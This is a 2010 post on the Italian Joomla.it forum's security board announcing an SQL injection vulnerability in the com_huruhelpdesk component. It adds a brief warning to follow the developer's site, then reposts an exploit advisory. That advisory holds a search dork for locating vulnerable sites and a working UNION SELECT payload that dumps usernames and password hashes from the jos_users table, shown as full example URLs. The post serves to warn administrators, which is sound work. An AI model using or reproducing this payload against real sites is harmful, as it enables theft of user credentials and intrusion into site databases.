Joomla.it Forum

Non solo Joomla... => Sicurezza => : jeckodevelopment 23 Jul 2010, 22:59:34

: Joomla Component HuruHelpdesk - com_huruhelpdesk SQL Injection Vulnerability
: jeckodevelopment 23 Jul 2010, 22:59:34

Joomla Component Huru Helpdesk - com_huruhelpdesk  SQL Injection Vulnerability

Non si hanno ancora maggiori informazioni riguardo la vulnerabilità.
Consigliamo di seguire attentamente il sito dello sviluppatore per eventuali aggiornamenti.

:

====================================================
Joomla Component com_huruhelpdesk SQL Injection Vulnerability
===================================================
 
Author :   Amine_92
DORK    :  inurl:"index.php?option=com_huruhelpdesk"
===================================================
 
[+] Vulnerable File :
http://www.Victime.com/index.php?option=com_huruhelpdesk&view=detail&cid[0]=[SQL]
 
[+] ExploiT :
-1/**/union/**/select/**/1,2,3,concat%28username,0x3a,password%29,5,6,7+from+jos_users--
 
[+] Example :
http://www.Victime.com/index.php?option=com_huruhelpdesk&view=detail&cid[0]=-1/**/union/**/select/**/1,2,3,concat%28username,0x3a,password%29,5,6,7+from+jos_users--
[+] Demo :
http://www.Victime.com/index.php?option=com_huruhelpdesk&view=detail&cid[0]=-1/**/union/**/select/**/1,2,3,concat%28username,0x3a,password%29,5,6,7+from+jos_users--
 
==============================================